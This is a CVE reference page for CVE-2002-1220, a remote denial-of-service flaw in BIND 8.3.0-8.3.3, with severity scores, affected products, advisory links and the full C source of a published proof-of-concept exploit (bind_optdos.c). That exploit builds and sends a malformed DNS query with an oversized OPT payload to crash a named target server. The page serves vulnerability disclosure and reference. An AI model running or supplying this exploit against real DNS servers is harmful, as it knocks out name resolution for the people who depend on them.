CVE-2002-1220 : Detail

CVE-2002-1220

32.63%V3
Network
2004-09-01
02h00 +00:00
2004-08-03
22h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

BIND 8.3.x through 8.3.3 allows remote attackers to cause a denial of service (termination due to assertion failure) via a request for a subdomain that does not exist, with an OPT resource record with a large UDP payload size.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 22011

Publication date : 2002-11-11 23h00 +00:00
Author : spybreak
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/6161/info ISC BIND is vulnerable to a denial of service attack. When a DNS lookup is requested on a non-existant sub-domain of a valid domain and an OPT resource record with a large UDP payload is attached, the server may fail. /* * * bind_optdos.c * * OPT DoS Remote Exploit for BIND 8.3.0 - 8.3.3-REL * Based on the bug disclosed by ISS * * (c) Spybreak ([email protected]) November/2002 * * Proof of concept exploit code * For educational and testing purposes only! * * * Usage: ./bind_optdos domain target [udp_size] * * domain - should be a nonexistent subdomain * of an existing one, different from the target's, * or a domain whose authoritative name servers are * unreachable * * * Greetz to: sd, g00bER and hysteria.sk ;-) * */ #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <signal.h> #include <time.h> #define UDP_SIZE 65535 #define OPT 41 #define PORT 53 #define MAXRESP 1024 #define TIMEOUT 10 typedef struct { unsigned short rcode : 4; unsigned short zero : 3; unsigned short ra : 1; unsigned short rd : 1; unsigned short tc : 1; unsigned short aa : 1; unsigned short opcode : 4; unsigned short qr : 1; } MSG_FLAGS; typedef struct { unsigned short id; unsigned short flags; unsigned short nqst; unsigned short nansw; unsigned short nauth; unsigned short nadd; } DNS_MSG_HDR; void usage(char *argv0) { printf("********************************************\n" "* OPT DoS Exploit for BIND 8.3.[0-3] *\n" "* (c) Spybreak November/2002 *\n" "********************************************\n"); printf("\n%s domain target [udp_size]\n\n", argv0); exit(0); } void sig_alrm(int signo) { printf("No response yet, the target BIND seems to be down\n"); exit(0); } main(int argc, char **argv) { struct sockaddr_in targ_addr; struct hostent *he; MSG_FLAGS fl; DNS_MSG_HDR hdr; unsigned char qname[512], buff[1024]; unsigned char *bu, *dom, *dot; int msg_size, dom_len, sockfd, n; unsigned short udp_size = UDP_SIZE; char response[MAXRESP + 1]; if (argc < 3) usage(argv[0]); if (argc == 4) udp_size = (unsigned short) atoi(argv[3]); if (!(he = gethostbyname(argv[2]))) { printf("Invalid target '%s'\n", argv[2]); exit(-1); } printf("Query on domain: %s\nTarget: %s\n", argv[1], argv[2]); printf("EDNS UDP size: %u\n", udp_size); if (argv[1][strlen(argv[1]) - 1] == '.') argv[1][strlen(argv[1]) - 1] = '\0'; strncpy(qname + 1, argv[1], sizeof(qname) - 2); dom = qname; while (dot = (unsigned char *) strchr(dom + 1, '.')) { *dom = dot - dom - 1; dom = dot; } *dom = strlen(dom + 1); dom_len = dom - qname + strlen(dom + 1) + 2; bu = buff; fl.qr = 0; fl.opcode = 0; fl.aa = 0; fl.tc = 0; fl.rd = 1; fl.ra = 0; fl.zero = 0; fl.rcode = 0; srand(time(0)); hdr.id = htons((unsigned short) (65535.0*rand()/(RAND_MAX+1.0)) + 1); hdr.flags = htons(*((unsigned short *) &fl)); hdr.nqst = htons(1); hdr.nansw = 0; hdr.nauth = 0; hdr.nadd = htons(1); bcopy(&hdr, bu, sizeof(hdr)); bu += sizeof(hdr); bcopy(qname, bu, dom_len); bu += dom_len; *(((unsigned short *) bu)++) = htons(1); //query type *(((unsigned short *) bu)++) = htons(1); //query class //opt rr *bu++ = '\0'; *(((unsigned short *) bu)++) = htons(OPT); //type *(((unsigned short *) bu)++) = htons(udp_size); //udp payload size *(((unsigned int *) bu)++) = htons(0); //extended rcode and flags *(((unsigned short *) bu)++) = htons(0); //rdlen msg_size = bu - buff; bzero(&targ_addr, sizeof(targ_addr)); targ_addr.sin_family = AF_INET; targ_addr.sin_port = htons(PORT); targ_addr.sin_addr = *(struct in_addr *) he->h_addr; sockfd = socket(AF_INET, SOCK_DGRAM, 0); if (sockfd < 0) { perror("socket"); exit(-1); } n = sendto(sockfd, buff, msg_size, 0, (struct sockaddr *) &targ_addr, (socklen_t) sizeof(targ_addr)); if (n < 0) { perror("sendto"); exit(-1); } printf("Datagram sent\nWaiting for response ...\n"); signal(SIGALRM, sig_alrm); alarm(TIMEOUT); n = recvfrom(sockfd, response, MAXRESP, 0, NULL, NULL); alarm(0); printf("Response received, the target BIND seems to be still up\n"); printf("Maybe the target is not an OPT DoS vulnerable BIND version,recursion disabled, or try to change domain/udp_size, ...\n"); exit(0); }

Products Mentioned

Configuraton 0

Isc>>Bind >> Version 8.3.0

Isc>>Bind >> Version 8.3.1

Isc>>Bind >> Version 8.3.2

Isc>>Bind >> Version 8.3.3

Configuraton 0

Freebsd>>Freebsd >> Version 4.4

Freebsd>>Freebsd >> Version 4.5

Freebsd>>Freebsd >> Version 4.6

Freebsd>>Freebsd >> Version 4.7

Openbsd>>Openbsd >> Version 3.0

Openbsd>>Openbsd >> Version 3.1

Openbsd>>Openbsd >> Version 3.2

References

http://www.cert.org/advisories/CA-2002-31.html
Tags : third-party-advisory, x_refsource_CERT
http://www.debian.org/security/2002/dsa-196
Tags : vendor-advisory, x_refsource_DEBIAN
http://online.securityfocus.com/advisories/4999
Tags : vendor-advisory, x_refsource_COMPAQ
http://marc.info/?l=bugtraq&m=103763574715133&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.kb.cert.org/vuls/id/229595
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/6161
Tags : vdb-entry, x_refsource_BID
http://online.securityfocus.com/archive/1/300019
Tags : mailing-list, x_refsource_BUGTRAQ
http://marc.info/?l=bugtraq&m=103713117612842&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.ciac.org/ciac/bulletins/n-013.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-077.php
Tags : vendor-advisory, x_refsource_MANDRAKE